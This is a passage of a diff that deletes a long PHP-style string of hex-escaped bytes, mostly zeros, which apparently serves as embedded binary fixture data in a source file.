-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xC5\x13\x68\x2B\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\x00\xF5".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x52\x35\xB8\x7D\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x97\x26\xD0\x56".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2D\x17".
-	        "\x2E\x1B\xB1\x48\xB2\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x65\x00\xC2\x00\xE6\x00\x43\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x45\x3C\x53\x75\x33\x2B\x25\x62\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x00\xC1\x00\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x01\x01".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x54\x76\xF8\x4E\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xF5\xF5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFC\x9A\x15\xD2\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\xF5\xF4\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA8\xEC\xED\x9C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0C\x1C\xE0\x75\x19\xCB\xF5\xA2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x65\x65\xBC\xC2\xD9\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\xF4\x52\xA1\xD1\x08\xCD\x5D\x4E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x90\x48\xC1\xD8\x12".
-	        "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
